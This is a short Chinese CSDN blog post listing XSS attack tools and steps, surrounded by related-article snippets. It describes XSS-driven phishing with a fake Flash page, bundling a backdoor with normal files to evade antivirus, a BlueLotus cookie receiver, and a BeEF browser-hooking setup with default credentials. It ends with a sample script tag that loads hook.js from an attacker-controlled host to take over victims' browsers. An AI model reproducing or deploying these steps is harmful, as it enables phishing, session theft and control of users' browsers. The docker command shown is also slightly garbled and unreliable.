XSS工具

已于 2023-09-03 21:50:04 修改
阅读量216 收藏 1
点赞数 2
文章标签: xss 前端 php
于 2023-09-03 17:28:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50607688/article/details/132652442
版权

XSS跨站-攻击利用-网络钓鱼

1、部署可访问的钓鱼页面并修改

2、植入XSS代码等待受害者触发

3、将后门及正常文件捆绑打包免杀

https://github.com/r00tSe7en/Fake-flash.cn

XSS跨站-攻击利用-溯源综合

1XSS数据平台-XSSReceiver

简单配置即可使用,无需数据库,无需其他组件支持

搭建:https://github.com/epoch99/BlueLotus_XSSReceiver-master

2、浏览器控制框架-beef-xss

只需执行JS文件,即可实现对当前浏览器的控制,可配合各类手法利用

搭建:docker run --rm -3000:3000 janes/beef

账号:beef

密码:beef

UI后台:http:IP:3000/ui/panel

http://ip:3000/hook.js

使用:https://zhuanlan.zhihu.com/p/625443637

简单xss示例

<script src=http://192.168.153.121:3000/hook.js></script>

夏花001
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
免费蓝莲花Bluelotus,XSS工具网安
08-14
【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】...
xss工具xssfork.rar
02-18
xssfork是一款新一代xss漏洞探测工具,其开发的目的是帮助安全从业者高效率的检测xss安全漏洞。与传统检测工具相比xssfork使用的是 webkit内核的浏览器phantomjs,其可以很好的模拟浏览器。工具分为两个部分,...
【docker】docker run的--rm选项详解、Exited 12 minutes ago
m0_45406092的博客
07-25 2万+
在Docker容器退出时,默认容器内部的文件系统仍然被保留,以方便调试并保留用户数据。 因此,可以通过--rm命令,让容器在退出时,自动清除挂在的卷,以便清除数据: 另外,当容器退出时,通过 docker ps是看不到,需要携带-a参数: docker ps -a 如果此时携带--rm,那么及时-a参数,也看不到该容器信息。 执行docker run命令带--rm命令选项,等价于在容器退出后,执行docker rm -v 通常--rm参数会和Foreground模式的容器使用,因为Foreground
docker run的--rm选项详解
热门推荐
成长的足迹
06-11 11万+
在Docker容器退出时,默认容器内部的文件系统仍然被保留,以方便调试并保留用户数据。 但是,对于foreground容器,由于其只是在开发调试过程中短期运行,其用户数据并无保留的必要,因而可以在容器启动时设置--rm选项,这样在容器退出时就能够自动清理容器内部的文件系统。示例如下: docker run --rm ba-208 等价于 docker run --rm=true ba-20...
Docker搭建Yapi及迁移
邪神_博客
09-17 593
Docker搭建Yapi及迁移 安装mongo docker run -p 27017:27017 -d -v /data/mongo/data:/data/db -v /data/mongo/conf:/data/configdb --name mongoserver mongo --auth 安装yapi 注意: yapi不要开放外网,存在恶意mock漏洞,解决办法:Yapi的mock漏洞 我采用的是dockfile,搭建yapi服务, 准备工作 Dockerfile内容: FROM alpine:l
打Cookie小工具_BlueLotus_XSSReceiver
crowsec
10-20 2900
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01 什么是打cookie? 网上其实已经有很多非常好的解释了,在这里一句话总结下就是:在你访问的页面上执行了一次JS代码,这次代码执行之后可以获取你当前已经登录某个网站的cookie,并将该cookie发送到攻击者指定的网站,攻击者利用当前的cookie来登录你的网站。 攻击者用来接收cookie的平台就叫做xss 平台,在网上这种平台其实非常多,但是如果用过的同学应该有些感触,有些平台存在黑吃黑的情况(懂得都懂),而且好多渗..
xss 检查工具
08-08
本文将详细介绍一个名为“XssMyTest”的XSS检查工具类,该工具可能是一个开源项目,由开发者分享在ITEYE博客平台上。由于没有提供具体的源代码或详细描述,我们将基于一般XSS检查工具的常见功能来探讨其可能包含的...
njaXt:不只是另一个XSS工具
05-12
查找XSS的GUI工具 安装 $ pip3 install njaxt 用法 开发设置 git clone https://github.com/ujjwal96/njaXt.git cd njaXt ./setup.sh source venv/bin/activate 常问问题 什么是XSS? 跨站点脚本攻击(XSS)是一种...
XSS漏洞检测工具
06-11
XSS漏洞检测工具,Linux下安装使用,很简单 Examples of usage: ============================== * Simple injection from URL: $ python XSSer.py -u "http://host.com" ------------------- * Simple injection...
CTFshow--web--xss
pwfortune的博客
07-16 1088
先在自己的服务器写上代码要拿到管理员的cookie , 而不是自己的。
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 1028
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
前端面试题日常练-day97 【Less】
最新发布
qq_44640575的博客
07-20 385
border-radius()函数用于在Less中生成圆形边框效果。通过设置border-radius()函数,我们可以为元素的边框添加圆角效果,使边框呈现圆形的外观,从而美化页面元素的边框样式。
TinyVue v3.17.0 正式发布,推出了一款基于 Quill 2.0 的富文本编辑器,功能强大、开箱即用!
OpenTiny的博客
07-17 1229
本文由体验技术团队Kagol老师原创~我们非常高兴地宣布,2024年6月26日,TinyVue 发布了 v3.17.0 🎉。TinyVue 每次大版本发布,都会给大家带来一些实用的新特性,上一个版本我们重构了 chart-core,新增 CircleProcessChart 圆环进度图等6个新的图表组件,并增加了 Statistic 数据统计组件。表格图片超链接复制粘贴插入表情文件上传@提醒斜杆菜单v-auto-tip。
LG 选择 Flutter 来增强其智能电视操作系统 webOS
恋猫de小郭的博客
07-17 1719
总的来说,LG 是 Flutter 在 TV 领域的一次新的尝试,并且它是在脱离了 Android 平台的场景下实现的支持,虽然 webOS 并不是什么流行的系统,但是这也体现出了 Flutter 的特点:可以用较低的成本实现较好性能的跨平台。后续,在 LG 的主导下,WebOS 经过进一步修改,转变为智能电视操作系统,于是 WebOS TV 就诞生了,此后 LG 的 TV 基本路线定为 webOS ,在应用层面,WebOS TV 以基于 Web 的技术为基础。然后 LG 为什么选择 webOS?
前端性能优化--懒加载
weixin_43799793的博客
07-19 161
3、同时还可结合 lazy loading 属性,利用浏览器的原生属性,进一步优化图片加载,不过其延迟加载机制完全是由浏览器自身决定的,在不同浏览器上效果不同(BTW,部分浏览器可能并不支持)。2、然后对元素进行监听,当图片进入可视区域时,提取元素的 data-src 即真实的图片地址赋值给 src 属性,就会去发送请求加载图片,实现了懒加载。设置为 1 张 1px*1px 的透明图片用作占位符,以防止出现出错图标。TinyPNG 网站: https://tinypng.com/
[web]-反序列化-绕过__wakeup(转)
mails2008的专栏
07-18 340
终点:很直接是echo $flag,在__destruct中,username==='admin' 和 password==100。反序列化过程中发现起点在终点之前调用,反而是捣乱的,那我们就不需要自动执行__wakeup,绕过的方法,设置的字段数量比实际字段大的值。其实简单的很简单,难得也很难,慢慢学习就好,没必要焦虑,觉得很难,纯粹一个兴趣爱好就行。起点:_wakeup函数中是$this->username='guest',是给赋值;按照常规思路,寻找起点、终点、跳板。
vue3前端开发-如何让自己的网站适合SEO排名规则
yrldjsbk的博客
07-17 250
我们大家都知道,原始出生的vue3项目,原始代码层面,是没有meta标签的,也就是说,不适合SEO排名规则。SEO排名规则,蜘蛛爬虫抓取网站页面的内容,就会把这种meta标签内容进行采集,匹配。但是,这个技术要求大家还是应该知道的。黑马教育,课程,前端课程案例项目:小兔鲜儿超市,vue3前端项目案例。想学习vue3前端开发,拿来练习,实战的朋友们,值得一看哦。这个代码,就是我自己手工录入的。录入后,再次在浏览器界面刷新请求服务器。返回的代码模块就可以看见了。自己刚刚手工录入的meta信息出现了。
原生html贪吃蛇?
weixin_52236586的博客
07-18 261
【代码】原生html贪吃蛇?
xss漏洞检测工具推荐
06-01
推荐以下几款xss漏洞检测工具: 1. OWASP ZAP:一款功能强大的开源Web应用程序安全扫描工具,支持xss漏洞检测。 2. Acunetix:一款流行的Web应用程序安全扫描工具,提供全面的xss漏洞检测功能。 3. Burp Suite:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值